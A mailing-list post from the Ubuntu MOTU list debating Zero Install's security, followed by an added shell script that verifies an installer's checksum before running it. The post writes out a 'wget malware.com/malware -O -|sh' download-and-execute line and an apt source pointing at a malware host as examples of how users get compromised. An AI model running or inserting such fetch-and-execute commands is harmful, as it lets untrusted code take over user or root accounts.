On Tue, 09 Jan 2007 22:41:56 +0100, Reinhard Tartler wrote:

> "Thomas Leonard" <[EMAIL PROTECTED]> writes:
>
>> I think you'll find the security model is rather different in Zero Install.
>>
>> In particular, it should never "break" a user account, since it only
>> ever writes to the directories ~/.config/0install.net
>> and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything
>> else ;-).
>
> Err, that's fair enough. My concern is rather that code from
> unknown/unauthorized 3rd parties is executed, so the perfect way to
> inject trojan or other malware.

Well, here are three possible ways to install malware:

- Tell Zero Install to run http://malware.com/malware. Either ignore the
  warning about the key being unknown, or take the risk that the key isn't
  trustworthy even if it's in the database.
  Result: User account compromised.

- Type:

    $ wget malware.com/malware -O -|sh

  Result: User account compromised.

- Edit /etc/apt/sources.list and add:

    deb http://malware.com/...

  Result: Root compromise.

As a malware author, why would you use Zero Install instead of one of the
other methods? The second one is available to all users and at least as
effective. Plus, your victims get no warnings about keys at all that way.

Note: I copied that wget example from a real web page for some genuine
software (but I changed the name ;-) - people are really forced to do this
kind of thing at the moment!

It really depends why someone is trying to install the software:

- "This game looks fun!" "Hmm... it's too hard to install." "Let's install
  a different game from Ubuntu's approved repository instead!"

vs

- "I need this software to get my work done and Ubuntu doesn't have it."

or

- "I'll keep trying until it's installed."

>>> Furthermore, I have some security concerns (who validates/authorizes a
>>> signature from one upstream).
>>
>> The user installing the software, assisted by a "hints" database of known
>> keys. While you can try to protect users from installing malware, at the
>> end of the day it *is* their computer, and they have to make the final
>> judgement.
>
> Where do these 'known' keys come from? Who authorizes these keys?

Currently, people post them to a public mailing list and I add them.
Here's a screenshot showing a typical dialog:

  http://0install.net/trustbox.png

If universe has stricter checks, we could use that keyring too for the
hints ("This key is approved by MOTU" / "MOTU has not approved this key -
USE AT OWN RISK!").

>> Please let me know if you have any other concerns.
>
> Well, in Ubuntu, the archive's key comes from the installation media. I
> have the concern that it may seem that including 0install could imply
> that we 'authorize' other 3rd party software.

Do Ubuntu users really need to be "authorised" by you to run software on
their own computers? Note that there are no pre-approved keys, just
information about where the key was announced.

Perhaps we could make the confirmation stronger; something like what you
get from "apt-get remove grep"?

As always, there's a balance. Make it too easy to install programs and some
people will install every stupid toy they see. Make the installer too
strict, and people start doing "wget | sh" and not using it at all.

> I fear that we'll get bug reports from 3rd party software by users, who
> have installed random software via 0install, and that we will not be
> able to support them.

That's true. How do you deal with this problem with Firefox extensions,
Python distutil modules, modified sources.list files and similar?

Thanks,

-- 
Dr Thomas Leonard
http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1

-- 
Ubuntu-motu mailing list
[email protected]
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
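The thread contrasts Zero Install's key warning with the `wget ... -O - | sh` habit, which gives the user no check at all before running code. As an added example (not part of the thread, and not Zero Install's or Ubuntu's own tooling), the script below shows the minimal defensive alternative: save the installer to a file, compare it against a checksum obtained out of band (for instance from a signed release announcement), and run it only on a match. The `verify_and_run` and `demo` function names, the sample script body and the tampered copy are all constructed for this demonstration; a real deployment would pin the checksum from the publisher, not compute it locally as `demo` does to keep the example self-contained.

```shell
#!/bin/sh
# Added example: verify-before-execute instead of piping an unverified
# download straight into sh. The expected checksum must come from a source
# independent of the download (in real use it is never derived from the
# file being checked; demo() only does that so the example runs offline).

# verify_and_run FILE EXPECTED_SHA256
# Runs FILE with sh only if its SHA-256 matches EXPECTED_SHA256.
# Returns 1 (and runs nothing) on a mismatch.
verify_and_run() {
    file="$1"
    expected="$2"
    actual=$(sha256sum "$file" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        echo "refusing to run $file: checksum mismatch" >&2
        return 1
    fi
    sh "$file"
}

# demo: builds a harmless constructed installer, pins its checksum, then
# shows that an altered copy is refused while the genuine file runs.
# Returns 0 when both behaviours are as expected.
demo() {
    dir=$(mktemp -d)
    genuine="$dir/install.sh"
    altered="$dir/install-altered.sh"

    # Constructed "installer" content; it only creates a marker file.
    printf '%s\n' '#!/bin/sh' "touch \"$dir/installed\"" > "$genuine"
    # Stand-in for the out-of-band pinned value (see note above).
    pinned=$(sha256sum "$genuine" | cut -d' ' -f1)

    # A tampered copy: same script with an extra line appended.
    cp "$genuine" "$altered"
    echo 'echo tampered' >> "$altered"

    # The altered file must be refused and must not run.
    if verify_and_run "$altered" "$pinned"; then
        rm -rf "$dir"; return 1
    fi
    # The genuine file must run and leave its marker.
    verify_and_run "$genuine" "$pinned" || { rm -rf "$dir"; return 1; }
    [ -f "$dir/installed" ] || { rm -rf "$dir"; return 1; }

    rm -rf "$dir"
    return 0
}
```

Running `demo` prints one "refusing to run" line for the altered copy and exits 0; the pipe-to-shell form has no equivalent decision point, which is the gap the thread is arguing about.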
